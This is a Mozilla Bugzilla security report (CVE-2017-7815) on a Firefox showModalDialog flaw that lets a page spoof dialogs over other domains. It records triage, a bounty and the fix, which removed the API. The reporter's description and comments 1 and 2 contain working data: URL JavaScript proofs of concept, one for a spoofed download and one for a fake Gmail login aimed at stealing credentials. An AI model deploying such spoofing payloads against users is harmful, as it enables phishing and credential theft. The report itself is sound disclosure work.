Closed
Bug 1368981
(CVE-2017-7815)
Opened 8 years ago
Closed 7 years ago
Firefox allows you to insert modal dialog in any domain
Categories
(Core :: DOM: Core & HTML, defect, P2)
Core
DOM: Core & HTML
Tracking
()
People
(Reporter: jm.acuna73, Assigned: mrbkap)
References
Details
(Keywords: reporter-external, sec-moderate, Whiteboard: [adv-main56+][post-critsmash-triage] Fixed by removing ShowModalDialog in bug 981796)
Attachments
(1 file)
|
3.39 MB,
video/webm
|
Details |
User Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Steps to reproduce:
1- Go to:
data:text/html,<script>function loadIframe() {win = open('','_top');win.document.open();win.document.write('data:text/html,<s'+'cript>location="https://www.google.com";</s'+'cript>');win.document.close();}function go() {var iframe = '<iframe onload="loadIframe();"></iframe>';document.body.innerHTML = iframe; showModalDialog('https://www.firefox.com','','dialogWidth=600;dialogHeight=600');}</script><input type="button" onclick="go()" value="test"/>
2- Click button
Bug detected in Firefox browsers that do not use multi-process architecture or e10s
Tested in:
Firefox Nightly 55.0a1 (2017-05-17) (64-bit)
Firefox Developer Edition 54.0a2 (2017-04-18) (32-bits)
Firefox 53.0.2 (32-bit)
Note:
I consider that it is not a variant of the bug with id 1365875 because the showModalDialog method is not part of the three types of native popup boxes in javascript
|
Reporter | |
Updated•8 years ago
|
Group: firefox-core-security
|
||
Updated•8 years ago
|
Group: firefox-core-security → dom-core-security
Component: Untriaged → DOM
Product: Firefox → Core
Version: 55 Branch → unspecified
|
|
Reporter | |
Comment 1•8 years ago
|
||
You could use the showModalDialog method to download a file from an unauthorized domain.
Example:
data:text/html,<input type="button" onclick="go()" value="test"/><script>
function loadIframe() {
var win = open('','_top');
win.document.open();
win.document.write('data:text/html,<s'+'cript>location = \'https://www.google.com\';</s'+'cript>');
win.document.close();
}
function go() {
var iframe = '<iframe style="border:0;height:0;width:0" onload="loadIframe();"></iframe>';
document.body.innerHTML += iframe;
window.showModalDialog('http://d.7-zip.org/a/7z1700.exe',window,'dialogWidth=100px;dialogHeight:100px');
}
</script>
|
|
Reporter | |
Comment 2•8 years ago
|
||
And it could even steal the credentials of an unsuspecting user.
Go to:
data:text/html,<input type="button" onclick="go()" value="test"/>
<script>
function loadIframe() {
var win = open('','_top');
win.document.open();
win.document.write('data:text/html,<s'+'cript>location = \'https://mail.google.com\';</s'+'cript>');
win.document.close();
}
function go() {
var iframe = '<iframe style="border:0;height:0;width:0" onload="loadIframe();"></iframe>';
document.body.innerHTML = iframe;
window.showModalDialog('data:text/html,<h3>Loadig...</h3><input type="button" value="Accept" onclick="window.close()"/>',window,'dialogWidth=100px;dialogHeight:100px');
location = 'http://feeds.feedburner.com/GoogleInbox';
}
</script>
|
||
Comment 3•8 years ago
|
||
We're removing showModalDialog with e10s (in bug 981796), right, Blake?
Flags: needinfo?(mrbkap)
|
||
Comment 4•8 years ago
|
||
(In reply to Andrew Overholt [:overholt] from comment #3)
> We're removing showModalDialog with e10s (in bug 981796), right, Blake?
showModalDialog isn't supported with e10s, and comment 0 says this doesn't affect e10s.
We looked at this in sec triage, and it seemed like a fairly convincing spoof.
|
|
Reporter | |
Comment 5•8 years ago
|
||
|
||
Updated•8 years ago
|
See Also: → CVE-2017-7791
|
Assignee | |
Comment 6•8 years ago
|
||
Let's just turn off showModalDialog for everybody. It'll be behind a pref for a bit and we'll remove the code soon after.
|
|
Assignee | |
Updated•8 years ago
|
Flags: needinfo?(mrbkap)
|
|
||
Comment 7•8 years ago
|
||
I was thinking we'd eventually get e10s to 100% but comment 6 works for me. I'm assuming we'll just do that in bug 981796.
|
|
||
Comment 8•8 years ago
|
||
And Blake sent email: https://groups.google.com/forum/#!msg/mozilla.dev.platform/4t5AAxxrCoA/hFXL2HsGBwAJ
|
|
||
Updated•8 years ago
|
Priority: -- → P2
|
||
Updated•8 years ago
|
Keywords: sec-moderate
|
||
Updated•8 years ago
|
Flags: sec-bounty?
|
|
Reporter | |
Comment 9•7 years ago
|
||
Hi,
I do not know what exactly means "bug which should be worked on in the next release/iteration"
but I have checked that it is reproduced in:
- Firefox 55.0.3 (32-bit)
- Firefox ESR 52.3.0 (64-bit)
It is not reproduced in:
- Firefox Developer Edition 56.0b3 (32-bits)
- Firefox Nightly 57.0a1 (2017-08-28) (64-bit)
Tested in Firefox browsers that do not use multi-process architecture or e10s.
(I used the html code from Comment 2)
|
|
||
Comment 10•7 years ago
|
||
This was fixed via bug 981796, which removed showModalDialog.
Assignee: nobody → mrbkap
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
status-firefox55:
--- → wontfix
status-firefox56:
--- → fixed
status-firefox57:
--- → fixed
status-firefox-esr52:
--- → wontfix
Resolution: --- → FIXED
|
|
Reporter | |
Comment 11•7 years ago
|
||
I understand now :)
Thank you!
|
||
Updated•7 years ago
|
Flags: sec-bounty? → sec-bounty+
Whiteboard: Fixed by removing ShowModalDialog in bug 981796
|
|
||
Updated•7 years ago
|
Group: dom-core-security → core-security-release
|
|
||
Updated•7 years ago
|
Alias: CVE-2017-7815
Whiteboard: Fixed by removing ShowModalDialog in bug 981796 → [adv-main56+] Fixed by removing ShowModalDialog in bug 981796
|
|
||
Updated•7 years ago
|
Flags: qe-verify-
Whiteboard: [adv-main56+] Fixed by removing ShowModalDialog in bug 981796 → [adv-main56+][post-critsmash-triage] Fixed by removing ShowModalDialog in bug 981796
|
|
||
Updated•7 years ago
|
Group: core-security-release
|
||
Updated•6 years ago
|
Component: DOM → DOM: Core & HTML
|
||
Updated•9 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•